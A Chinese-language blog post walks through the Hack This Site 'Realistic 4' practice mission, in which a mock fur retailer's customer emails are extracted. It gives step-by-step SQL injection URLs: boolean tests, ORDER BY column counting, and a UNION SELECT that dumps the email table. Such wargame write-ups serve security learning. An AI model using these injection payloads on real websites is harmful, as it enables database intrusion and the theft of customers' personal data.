Hack this site realistic4

Hack this site realistic 4 这一关是让你帮忙给一个做皮草的网站一点颜色看看,帮忙获取客户的邮箱,给他们发邮件告诉他们别买皮草;
这一关刚开始看到的时候,想到了应该是sql注入,但是技术不行,不知道怎么搞;
搜了一下,学了学别人的方法,总结了一下逻辑和过程:
首先看界面:
Hack this site realistic4_第1张图片
有产品展示页面,有添加邮件功能
随便输入错误的邮箱,发现有重要的提示,有一个表Email:Hack this site realistic4_第2张图片
在产品展示页面,可以看到URL如下所示,猜想是否可以sql注入:
Hack this site realistic4_第3张图片
1、在地址栏输入
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 and 1=1
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 and 1=2
发现可以sql注入
发现存在sql injection 注入问题。我们猜测下字段数量。(为什么这么猜,不知道,有知道的大神请指点一下
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 order by 1
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 order by 2
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 order by 3
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 order by 4
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 order by 5
到第5个时出错。
所以有四个字段。这个页面查询的表显然不是email表。而我们要读取email表,所以我们要用到联合。
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all select 1,2,3,4 from email
发现可以正常访问,只是多了几张图片。

我们看到图片后面跟了数字2和3.我们将2替换成*,从而达到select * from email的效果。
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 union all select 1,*,3,4 from email

我们得到了邮箱地址。
回头总结一下sql注入,在补充下知识。

你可能感兴趣的:(学习)